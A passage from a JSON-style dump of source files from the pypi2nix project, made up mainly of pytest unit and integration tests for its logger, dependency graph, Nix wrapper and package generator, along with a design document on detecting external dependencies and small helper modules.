output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.ERROR, Verbosity.INFO))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_debug_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.debug(\"test\")\n\n output = get_logger_output(logger)\n assert \"DEBUG\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.DEBUG,))\ndef test_that_logger_with_high_verbosity_level_does_emit_debug_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.debug(\"test\")\n\n output = get_logger_output(logger)\n assert \"DEBUG\" in output\n\n\n@pytest.mark.parametrize(\"level\", list(Verbosity))\ndef test_that_verbosity_level_can_be_retrieved_from_assigned_integer(level):\n assert verbosity_from_int(level.value) == level\n\n\ndef test_that_high_number_gets_translated_into_debug_verbosity():\n assert verbosity_from_int(10000) == Verbosity.DEBUG\n\n\ndef test_that_low_number_gets_translated_into_error_verbosity():\n assert verbosity_from_int(-10000) == Verbosity.ERROR\n\n\ndef test_that_unconnect_proxy_logger_raises_proper_exception_on_logging(\n unconnected_proxy_logger,\n):\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.debug(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.info(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.warning(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.error(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.set_verbosity(Verbosity.DEBUG)\n" }, { "alpha_fraction": 0.6652719378471375, "alphanum_fraction": 0.6903765797615051, "avg_line_length": 28.875, "blob_id": "a41dacbacfbca8045a48e48b1c9a401fe3001cab", "content_id": "3c403230b7fa08c1a1e313157246cc49bd789e49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/integrationtests/test_fava.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass FavaTestCase(IntegrationTest):\n name_of_testcase = \"fava\"\n requirements = [\"fava==1.13\"]\n external_dependencies = [\"libxml2\", \"libxslt\"]\n constraints = [\"jaraco-functools == 2.0\"]\n" }, { "alpha_fraction": 0.7352429628372192, "alphanum_fraction": 0.7362659573554993, "avg_line_length": 33.91071319580078, "blob_id": "770bfad63d14751c7d9588642a28e386737457de", "content_id": "51c2f08670547fb420c31ae1dd80f04d140e9b13", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9775, "license_type": "permissive", "max_line_length": 88, "num_lines": 280, "path": "/unittests/test_dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from copy import copy\n\nimport pytest\n\nfrom pypi2nix.dependency_graph import CyclicDependencyOccured\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\n\n\ndef test_can_set_runtime_dependencies(\n package_a: Requirement, 
package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n assert dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_b\n )\n\n\ndef test_can_detect_indirect_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n) -> None:\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_runtime_dependency(dependent=package_b, dependency=package_c)\n assert dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n\n\ndef test_cyclic_runtime_dependencies_not_allowed(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_can_retriev_all_runtime_dependency_names(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n) -> None:\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_runtime_dependency(dependent=package_b, dependency=package_c)\n assert dependency_graph.get_all_runtime_dependency_names(package_a) == {\n package_a.name(),\n package_b.name(),\n package_c.name(),\n }\n\n\ndef test_can_set_buildtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n assert dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_b\n )\n\n\ndef test_build_time_dependencies_dont_show_up_as_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_buildtime_dependency(dependent=package_b, dependency=package_c)\n assert not dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n\n\ndef test_cannot_add_circular_buildtime_dependencies(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_cannot_add_circular_builtime_dependency_to_runtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_cannot_add_circular_runtime_dependency_to_buildtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef 
test_can_add_two_dependencies_graphs_and_runtime_dependencies_are_also_added(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_c\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert not dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert not other_dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert sum_graph.is_runtime_dependency(dependent=package_a, dependency=package_c)\n\n\ndef test_can_add_two_dependencies_graphs_and_buildtime_dependencies_are_also_added(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_c\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert not dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert not other_dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert sum_graph.is_buildtime_dependency(dependent=package_a, dependency=package_c)\n\n\ndef test_can_detect_external_dependencies_for_packages(\n package_a: Requirement,\n external_dependency_a: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_external_dependency(\n dependent=package_a, dependency=external_dependency_a\n )\n assert dependency_graph.get_all_external_dependencies(package_a) == {\n external_dependency_a,\n }\n\n\ndef test_can_retrieve_external_dependencies_from_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n external_dependency_a: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_external_dependency(\n dependent=package_b, dependency=external_dependency_a\n )\n assert dependency_graph.get_all_external_dependencies(package=package_a) == {\n external_dependency_a,\n }\n\n\ndef test_can_retrieve_external_dependencies_after_adding_graphs(\n package_a: Requirement,\n package_b: Requirement,\n external_dependency_a: ExternalDependency,\n external_dependency_b: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_external_dependency(\n dependent=package_a, dependency=external_dependency_a\n )\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_external_dependency(\n dependent=package_b, dependency=external_dependency_b\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert sum_graph.get_all_external_dependencies(package=package_a) == {\n external_dependency_a,\n external_dependency_b,\n }\n\n\ndef test_can_understand_wheel_dependecies(\n current_platform: TargetPlatform, requirement_parser: RequirementParser\n):\n runtime_dependencies = RequirementSet(current_platform)\n runtime_dependency = requirement_parser.parse(\"runtime_dependency\")\n runtime_dependencies.add(runtime_dependency)\n 
build_dependencies = RequirementSet(current_platform)\n build_dependency = requirement_parser.parse(\"build_dependency\")\n build_dependencies.add(build_dependency)\n wheel = Wheel(\n name=\"testpackage\",\n version=\"\",\n deps=runtime_dependencies,\n target_platform=current_platform,\n license=\"\",\n homepage=\"\",\n description=\"\",\n build_dependencies=build_dependencies,\n )\n requirement = requirement_parser.parse(\"testpackage\")\n dependency_graph = DependencyGraph()\n dependency_graph.import_wheel(wheel, requirement_parser)\n\n assert dependency_graph.is_buildtime_dependency(requirement, build_dependency)\n assert dependency_graph.is_runtime_dependency(requirement, runtime_dependency)\n\n\n@pytest.fixture\ndef package_a(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-a\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef package_b(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-b\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef package_c(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-c\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef dependency_graph() -> DependencyGraph:\n return DependencyGraph()\n\n\n@pytest.fixture\ndef external_dependency_a() -> ExternalDependency:\n return ExternalDependency(\"a\")\n\n\n@pytest.fixture\ndef external_dependency_b() -> ExternalDependency:\n return ExternalDependency(\"b\")\n" }, { "alpha_fraction": 0.7094017267227173, "alphanum_fraction": 0.7094017267227173, "avg_line_length": 22.399999618530273, "blob_id": "24aa81c94fdf5f2b641c5f9defa77b09ef2042c5", "content_id": "c6475fa0f4cbd1913c12a348808e10fc4087baf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 53, "num_lines": 5, "path": "/mypy/jsonschema.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\n\ndef validate(instance: Any, schema: Any) -> None: ...\n\nclass ValidationError(Exception): ...\n" }, { "alpha_fraction": 0.7803871035575867, "alphanum_fraction": 0.7855483889579773, "avg_line_length": 44.05813980102539, "blob_id": "85d51dbb4e7e2a96c48ae6a8d4a3597c550c9793", "content_id": "1ff0396a82cf0309688f664722d9572e8925414b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3876, "license_type": "no_license", "max_line_length": 77, "num_lines": 86, "path": "/source/external-dependencies.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "External Dependencies\n=====================\n\nThis chapter is based on a `PR for pypi2nix`_. Got there if you want\nto learn about the intial implementation of external dependency\ndetection.\n\nGoal\n----\n\nThe goal is to have a system that helps the user to deal with external\ndependencies. Currently the user has to know by heart (or trial and\nerror) that e.g. \\ ``lxml`` needs ``libxml2`` and ``libxslt``. We want\nto automate that for the user, at least for the most common packages.\n\nThe idea is to have a system that you pass your initial requirements and\nas a result you get a list of the necessary external dependencies. 
This\nwill have synergy with implementing automatic setup requirement\ndetection.\n\nMechanism\n---------\n\nEvery ``pypi2nix`` invocation has with it associated a set of\nrequirements. This is usually the set of requirements that the user has\nfor their project. To find out what kind of external dependencies are\nnecessary to build the requested packages we need to solve two problems:\n\n1) Find out all the dependencies of the specified/requested packages\n from the user without building them.\n2) For all of these dependencies find out if and what external\n dependencies are required without building all the packages.\n\nWe have to know all required external dependencies in advance since\nrestarting the whole build just because a dependency was detected us\nunacceptable. For some users with slower or older hardware even one\nsingle build might take more than 10 minutes for larger package sets. If\nthe build for restart several times it would render ``pypi2nix``\nunusable to those users.\n\nThat means that we have to have a place where dependency information can\nbe collected and used by pypi2nix. The information about the\ndependencies is basically a directed acyclic graph since this\nimplementation will not support circular dependencies (for now).\n\nFor collecting information about external dependencies we will rely on\nusers reporting such external dependencies for know. Developing a tool\nto detect external dependencies from build output is out of scope of\nthis PR.\n\nThe dependency graph for python dependencies can be generated by\n``pypi2nix`` automatically. This PR will include a mechanism to\ngenerated dependency graphs in the right data format for ingestion by\n``pypi2nix``.\n\nInfrastructure\n--------------\n\nWe need way to distribute a dependency tree to users. This will make the\ndetection mechanism much more useful since it frees users from\nmaintaining fresh set of dependencies. We want to implement a similar\nmechanism as with\n`pypi2nix-overrides <https://github.com/nix-community/pypi2nix-overrides>`__.\nThis means that we a have a semi-central git repository that contains\nall the detected dependencies. Since git is content addressable we can\nensure reproducible builds. Our security model with that approach is\n**Trust on First Use**.\n\nData format\n-----------\n\nIn order to minimize necessary labor we have to automate the generation\nof dependencies as much as possible. This means that we need to have\ndata format that allows seamless merging of generated and curated\ndependency trees. Also we should use a data format that is easy to edit\nby humans and machines alike. A suitable candidate would be the `yaml\nformat <https://yaml.org/>`__. This would allow us to provide `json\nschemas <https://json-schema.org/>`__ for the data format to allow for\neffective reuse of the data. A concern might be that the volume of the\ndata makes a compact data file to large to download. If in the future we\nrun into traffic or performance problems we might consider implementing\na web API. Already using `json schemas <https://json-schema.org/>`__\nwould make that transition easy as we could leverage OpenAPI 3.0 to make\nthe data format and the API accessible to many people.\n\n.. 
_`PR for pypi2nix`: https://github.com/nix-community/pypi2nix/pull/426\n" }, { "alpha_fraction": 0.6195651888847351, "alphanum_fraction": 0.6195651888847351, "avg_line_length": 22, "blob_id": "0641eea24bf5fe9c8a62c1c69abadc842d743864", "content_id": "584ab6febd32ec9e581db8065e95db5c06c9ae20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/scripts/repository.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\n\ndef find_root(start: Path = Path(\".\")) -> Path:\n absolute_location = start.resolve()\n if (absolute_location / \".git\").is_dir():\n return absolute_location\n else:\n return find_root(absolute_location / \"..\")\n\n\nROOT = find_root()\n" }, { "alpha_fraction": 0.7745974659919739, "alphanum_fraction": 0.7799642086029053, "avg_line_length": 36.266666412353516, "blob_id": "b9a8ba740e179907a0d6aa7d78b2e8b2b9d2d03e", "content_id": "8aea4fea4a06aa6c4acac1617d7a2b96ed3e6997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/src/pypi2nix/external_dependency_collector/lookup.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Set\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirements import Requirement\n\n\nclass RequirementDependencyRetriever:\n def __init__(self, dependency_graph: DependencyGraph = DependencyGraph()):\n self._dependency_graph = dependency_graph\n\n def get_external_dependency_for_requirement(\n self, requirement: Requirement\n ) -> Set[ExternalDependency]:\n return self._dependency_graph.get_all_external_dependencies(requirement)\n" }, { "alpha_fraction": 0.7148148417472839, "alphanum_fraction": 0.720370352268219, "avg_line_length": 35, "blob_id": "24fbef979b6f3fcb8977e88191d4931fd82e778d", "content_id": "70896344256d2228ad076587b59cd412585621a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 82, "num_lines": 15, "path": "/integrationtests/test_appdirs.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass AppDirsTestCase(IntegrationTest):\n \"\"\"This test checks if we handle quote characters '\"' in package descriptions.\n\n The appdirs package has a description that includes a '\"'. This\n description gets rendered into the \"meta\" attribute of the result\n nix derivation. 
We evaluate this attribute to make sure that\n everything is escaped fine.\n \"\"\"\n\n name_of_testcase = \"appdirs\"\n requirements = [\"appdirs==1.4.3\"]\n additional_paths_to_build = [\"packages.appdirs.meta\"]\n" }, { "alpha_fraction": 0.6954023241996765, "alphanum_fraction": 0.7011494040489197, "avg_line_length": 28, "blob_id": "14af294e6fe9189428fdd2a3d9438758eaf5c2fb", "content_id": "1944b383f30c275a9778928a5d57d1d68c7ba19c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 44, "num_lines": 6, "path": "/src/pypi2nix/version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\n\nHERE = os.path.dirname(__file__)\nVERSION_FILE = os.path.join(HERE, \"VERSION\")\nwith open(VERSION_FILE) as handle:\n pypi2nix_version = handle.read().strip()\n" }, { "alpha_fraction": 0.837837815284729, "alphanum_fraction": 0.8468468189239502, "avg_line_length": 8.25, "blob_id": "c9790f29a008a5f129febcb65e66f5f0f461371b", "content_id": "03a061cebecb1f5cc1e6c6dc6442d413a7a4e87e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 111, "license_type": "no_license", "max_line_length": 19, "num_lines": 12, "path": "/requirements.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "attrs\nclick\njinja2\nnix-prefetch-github\nparsley\ntoml\npackaging\njsonschema\nhypothesis\npyyaml\n\n-c constraints.txt\n" }, { "alpha_fraction": 0.6496350169181824, "alphanum_fraction": 0.6569343209266663, "avg_line_length": 34.739131927490234, "blob_id": "a47726258a873bf1f89448bd3a76d7e48db5d424", "content_id": "90dd47ec383f9f7271d7569b3d8f7aa69b076323", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "permissive", "max_line_length": 82, "num_lines": 23, "path": "/unittests/logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.logger import Logger\nfrom pypi2nix.logger import ProxyLogger\nfrom pypi2nix.logger import StreamLogger\n\n\ndef get_logger_output(logger: Logger) -> str:\n def get_inner_logger(logger: Logger) -> StreamLogger:\n if isinstance(logger, StreamLogger):\n return logger\n elif isinstance(logger, ProxyLogger):\n inner_logger = logger.get_target_logger()\n if inner_logger is None:\n raise Exception(\"ProxyLogger is not connected, cannot get output\")\n else:\n return get_inner_logger(inner_logger)\n else:\n raise Exception(\"Unhandled Logger implementation\", type(logger))\n\n logger = get_inner_logger(logger)\n logger.output.seek(0)\n output = logger.output.read()\n logger.output.seek(0, 2)\n return output\n" }, { "alpha_fraction": 0.6643379926681519, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 27.358489990234375, "blob_id": "5c7d8b03fda15b1cd0a3f8245cfb171f966bf215", "content_id": "b10a2cc5f8a321b3f393f1fc32a62fc71f28be9e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3006, "license_type": "permissive", "max_line_length": 89, "num_lines": 106, "path": "/unittests/test_nix.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\n\nimport pytest\n\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import ExecutableNotFound\nfrom pypi2nix.nix import Nix\n\nfrom .switches import nix\n\nHERE = os.path.dirname(__file__)\n\n\n@pytest.fixture\ndef 
nix_instance(tmpdir, logger):\n nix_path_addition = tmpdir.mkdir(\"testpath_exists\")\n yield Nix(\n nix_path=[\"test_variable={}\".format(str(nix_path_addition))], logger=logger\n )\n\n\n@pytest.fixture\ndef dummy_derivation():\n return os.path.join(HERE, \"data/shell_environment.nix\")\n\n\n@nix\ndef test_evaluate_nix_expression_works(nix_instance):\n assert nix_instance.evaluate_expression(\"1 + 1\") == \"2\"\n\n\n@nix\ndef test_evalulate_nix_expression_respects_additions_to_nix_path(nix_instance):\n assert \"testpath_exists\" in nix_instance.evaluate_expression(\"<test_variable>\")\n\n\n@nix\ndef test_evaluate_nix_expression_raises_exception_when_executable_not_found(logger):\n nix = Nix(executable_directory=\"/does-not-exist\", logger=logger)\n with pytest.raises(ExecutableNotFound):\n nix.evaluate_expression(\"true\")\n\n\n@nix\ndef test_shell_accepts_file_path_to_run_shell_script(nix_instance, dummy_derivation):\n output = nix_instance.shell(\"echo $out\", derivation_path=dummy_derivation)\n assert \"hello\" in output\n\n\n@nix\ndef test_shell_accepts_nix_arguments(nix_instance, dummy_derivation):\n output = nix_instance.shell(\n \"echo $out\",\n derivation_path=dummy_derivation,\n nix_arguments={\"dummy_argument\": \"perl\"},\n )\n assert \"perl\" in output\n\n\n@nix\ndef test_evaluate_expression_throws_on_erroneous_expression(nix_instance):\n with pytest.raises(EvaluationFailed):\n nix_instance.evaluate_expression(\"1+\")\n\n\n@nix\ndef test_build_expression_throws_on_syntax_error(nix_instance):\n with pytest.raises(EvaluationFailed):\n nix_instance.build_expression(\"with import <nixpkgs> {}; hello(\")\n\n\n@nix\ndef test_build_expression_creates_proper_out_link(nix_instance, tmpdir):\n output_path = tmpdir.join(\"output-link\")\n nix_instance.build_expression(\n \"with import <nixpkgs> {}; hello\", out_link=str(output_path)\n )\n assert output_path.exists()\n\n\n@nix\ndef test_build_respects_boolean_arguments(nix_instance, tmpdir):\n source_path = tmpdir.join(\"test.nix\")\n with open(source_path, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"{ argument }:\",\n \"with import <nixpkgs> {};\"\n 'if lib.assertMsg argument \"Argument is false\" then hello else null',\n ]\n )\n )\n nix_instance.build(source_file=str(source_path), arguments={\"argument\": True})\n\n\n@nix\ndef test_build_expression_respects_boolean_arguments(nix_instance):\n expression = \" \".join(\n [\n \"{ argument }:\",\n \"with import <nixpkgs> {};\"\n 'if lib.assertMsg argument \"Argument is false\" then hello else null',\n ]\n )\n nix_instance.build_expression(expression, arguments={\"argument\": True})\n" }, { "alpha_fraction": 0.7310705184936523, "alphanum_fraction": 0.7415143847465515, "avg_line_length": 24.53333282470703, "blob_id": "688fe32d31ce8bd4658589fde4508ff62aeb2675", "content_id": "9b57e18a15302833752546b88e7364eb99c4d3ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "permissive", "max_line_length": 88, "num_lines": 15, "path": "/unittests/templates.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Dict\n\nimport jinja2\n\nfrom pypi2nix.path import Path\n\nHERE = Path(os.path.dirname(__file__))\n\n_templates = jinja2.Environment(loader=jinja2.FileSystemLoader(str(HERE / \"templates\")))\n\n\ndef render_template(template_path: Path, context=Dict[str, str]) -> str:\n template = _templates.get_template(str(template_path))\n return 
template.render(**context)\n" }, { "alpha_fraction": 0.6707317233085632, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 27.941177368164062, "blob_id": "b795b902abf717594b3d4bfb9be17145c161a3e7", "content_id": "f56c236830af02444b1b2d9df77bc6b570e36dbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 95, "num_lines": 17, "path": "/integrationtests/test_ldap.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass LdapTestCase(IntegrationTest):\n name_of_testcase = \"ldap\"\n python_version = \"python27\"\n code_for_testing = [\"import ldap\"]\n requirements = [\"python-ldap\"]\n external_dependencies = [\"openldap\", \"cyrus_sasl\", \"openssl\"]\n\n def extra_environment(self):\n return {\n \"NIX_CFLAGS_COMPILE\": '\"-I${pkgs.cyrus_sasl.dev}/include/sasl $NIX_CFLAGS_COMPILE\"'\n }\n" }, { "alpha_fraction": 0.7325102686882019, "alphanum_fraction": 0.735939621925354, "avg_line_length": 31.399999618530273, "blob_id": "233269cac2101d8cbdc4145c08e149fabef4f72d", "content_id": "dc007c94e92aed8366d16ff546a4ddcd31aedf69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4374, "license_type": "permissive", "max_line_length": 84, "num_lines": 135, "path": "/unittests/test_package_generator.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.pip.virtualenv import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .package_generator import PackageGenerator\n\n\ndef test_can_generate_two_packages(package_generator: PackageGenerator) -> None:\n package_generator.generate_setuptools_package(name=\"package1\",)\n package_generator.generate_setuptools_package(name=\"package2\",)\n\n\ndef test_can_gerate_source_distribution_with_correct_name(\n package_generator: PackageGenerator,\n):\n distribution = package_generator.generate_setuptools_package(name=\"testpackage\")\n assert distribution.name == \"testpackage\"\n\n\ndef test_can_install_generated_packages(\n pip: Pip,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n target_directory: Path,\n install_target: Path,\n package_generator: PackageGenerator,\n):\n package_generator.generate_setuptools_package(name=\"testpackage\")\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n assert \"testpackage\" in pip.freeze(python_path=[install_target])\n\n\ndef test_can_generate_packages_with_requirements(\n package_generator: PackageGenerator,\n requirement_parser: RequirementParser,\n pip: Pip,\n target_directory: Path,\n install_target: Path,\n current_platform: TargetPlatform,\n):\n package_generator.generate_setuptools_package(\n name=\"testpackage\", install_requires=[\"other-package\"]\n )\n package_generator.generate_setuptools_package(name=\"other-package\")\n requirements = RequirementSet(target_platform=current_platform)\n 
requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n assert \"other-package\" in pip.freeze([install_target])\n\n\ndef test_can_generate_valid_packages_with_two_runtime_dependencies(\n package_generator: PackageGenerator,\n requirement_parser: RequirementParser,\n pip: Pip,\n target_directory: Path,\n install_target: Path,\n current_platform: TargetPlatform,\n):\n package_generator.generate_setuptools_package(\n name=\"testpackage\", install_requires=[\"dependency1\", \"dependency2\"]\n )\n package_generator.generate_setuptools_package(name=\"dependency1\")\n package_generator.generate_setuptools_package(name=\"dependency2\")\n requirements = RequirementSet(target_platform=current_platform)\n requirements.add(requirement_parser.parse(\"testpackage\"))\n pip.install(\n requirements,\n source_directories=[target_directory],\n target_directory=install_target,\n )\n installed_packages = pip.freeze([install_target])\n assert \"dependency1\" in installed_packages\n assert \"dependency2\" in installed_packages\n\n\n@pytest.fixture\ndef pip(\n logger: Logger,\n current_platform: TargetPlatform,\n target_directory: Path,\n wheel_distribution_archive_path: str,\n requirement_parser: RequirementParser,\n install_target: Path,\n) -> VirtualenvPip:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=str(install_target),\n env_builder=venv.EnvBuilder(with_pip=True),\n no_index=True,\n wheel_distribution_path=wheel_distribution_archive_path,\n find_links=[str(target_directory)],\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n\n\n@pytest.fixture\ndef target_directory(tmpdir_factory) -> Path:\n return Path(str(tmpdir_factory.mktemp(\"target-directory\")))\n\n\n@pytest.fixture\ndef install_target(tmpdir_factory) -> Path:\n return Path(str(tmpdir_factory.mktemp(\"install-target\")))\n\n\n@pytest.fixture\ndef package_generator(\n logger: Logger, target_directory: Path, requirement_parser: RequirementParser\n) -> PackageGenerator:\n return PackageGenerator(\n target_directory=target_directory,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n" }, { "alpha_fraction": 0.8507462739944458, "alphanum_fraction": 0.8507462739944458, "avg_line_length": 32.5, "blob_id": "34c2f5cd3a0d22fd37bc588fd0241632e3a97faa", "content_id": "3d1542818b21382bb3ef2b86e7ab5452c213b7ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/src/pypi2nix/pip/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .exceptions import PipFailed\nfrom .implementation import NixPip\nfrom .interface import Pip\nfrom .virtualenv import VirtualenvPip\n" }, { "alpha_fraction": 0.5827658176422119, 